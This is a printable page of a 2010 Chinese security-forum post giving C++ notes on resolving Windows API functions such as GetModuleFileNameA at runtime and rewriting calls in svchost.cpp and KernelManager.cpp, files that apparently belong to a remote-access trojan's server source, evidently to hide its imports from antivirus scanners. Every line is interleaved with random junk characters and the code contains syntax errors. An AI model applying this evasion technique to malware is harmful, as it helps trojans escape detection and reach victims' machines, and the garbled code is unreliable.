Board logo

标题: [原创文章] 全局动态调用 [打印本页]
作者: ice_xke    时间: 2010-10-19 12:30     标题: 全局动态调用

全局动态调用笔记
& A! C) a- f/ ~- [svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
. K# g2 q, V$ o8 h. L" J, H5 p----------------------------------------
* H8 }& C  F2 @9 M* G+ f) EDTDY.h:2 W2 f) Y/ S) `5 w

2 c; n6 M& q& q#if _MSC_VER>1000
* G# M) I9 p0 K4 E) b: E& `( ?) @#pragma once
+ C6 C) [6 [* ~; A#endif //_MSC_VER>1000& V+ {+ u; p0 V1 r( r* l
#include<windows.h>' q3 r9 U) Y$ d# h

* h9 j; p, m+ k! Rtypedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
' z6 y) N" x' _! J2 N8 Y: `class DTDY
: a+ z$ T8 D/ h7 x' U. B{& v9 }$ f5 o  L* `! d9 F- u
public:
& s) F/ V" {, j: P9 L% [5 U+ EDTDY();. [5 ?+ R1 I1 Y5 G( v
virtual ~DTDY();! D/ J! I- L, u! A: s2 P( G( m7 X9 R
public:! d/ v  S  K; g, y% a
static pGetModuleFileNameA MyGetModuleFileName;
# k% @8 Y7 z/ E5 cstatic BOOL FunInitiallization();
6 K$ ?7 Y7 D5 k% E};
7 H" r+ {! _9 ^3 B6 a: T" Q6 z#endif
3 t, @0 R6 T' v5 e& R. J2 U----------------------------------------
0 O# O  ~8 O* Y8 z8 y9 {
% Q9 d7 i/ }4 y+ I' w- ADTDY.cpp:' o" O" T7 ~/ G) L1 C( }

& I4 e( ^: m2 _! V5 H#include "DTDY.h"
. l: r" W6 F) hpGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
# x6 a7 b6 l. E2 P# GDTDY:TDY()
  O5 M) Q; x8 p& R{9 M$ P6 _( m' Z$ j0 q
}
  w& Z  A+ H0 g. ^, mDTDY::~DTDY()
3 U* {- X: R) L! d" f9 w( ]{
' M; X7 t( s: {9 a  B5 H}- G( K8 g  C( s' E! d" i
BOOL DTDY::FunInitiallization()5 W5 r7 w+ V/ k0 _
{) Z8 T% T& `6 D  T6 t
HMODULE hModule=LoadLibrary("kernel32.dll");
8 e0 K6 l) d) g; lMyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");4 p; s3 {8 r( `. T/ s
if(!MyGetModuleFileName=) return FALSE;+ @- U8 q. i, x& v  W5 N, }5 @
5 o4 q( N) n" D( H, y5 h
return TRUE;
  J* |3 t) N9 w/ v+ e- k5 ^}3 v$ D; [+ b* u/ g4 T
----------------------------------------
& B' _; S) k6 v3 hsvchost.cpp:. \/ j1 Y; v% J6 A

* h' X& [5 A4 ~: F5 _5 `) w/ a2 |  z: Q#include "DTDY.h") ~8 s; E. ?/ H

( o+ L0 E; z7 p+ {BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
* C: }* e; [" V5 v# k1 p{; o0 Z, v) }, ~( u! R/ E4 }
switch(ul_reason_for_call)
+ M1 |- _7 s$ v( W$ D$ j{
/ R2 D8 H5 x# {% d- ~: Fcase DLL_PROCESS_ATTACH:
, T7 i2 K9 A% x4 ?0 m, R+ zif(!DTDY::FunInitiallization()) return FALSE;
$ Z# e* }" s, M1 U$ O1 M, M4 }# E& S& d. b- o
break;' e- S/ g- w& G& c7 q6 f
}
. e, U% v9 o; P1 Z9 B# N}
, Y5 @0 V  C5 D" s& X- ]- f2 c5 U# T4 j3 b6 j8 S3 }" e; ?" s% ]) u
% D; s% ~: w! C5 _) I
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
1 A7 H! _. D$ G$ b改写为) }, p0 A3 l# b! q: L
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));9 L4 Y9 _# ?. U" m- u
----------------------------------------. T0 ?. a, C5 y5 L) [  @
KernelManager.cpp:
6 v' G  }  \' z2 I0 U
) H0 R" K, k2 {#include "../DTDY.h"5 C) D5 R' p' p1 t+ P% h8 i
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
9 a- J% j4 U; I1 z$ @( i3 l改写为( C& f5 z8 u" k% K& f
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
1 \2 B+ c% C1 m, y& A----------------------------------------



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2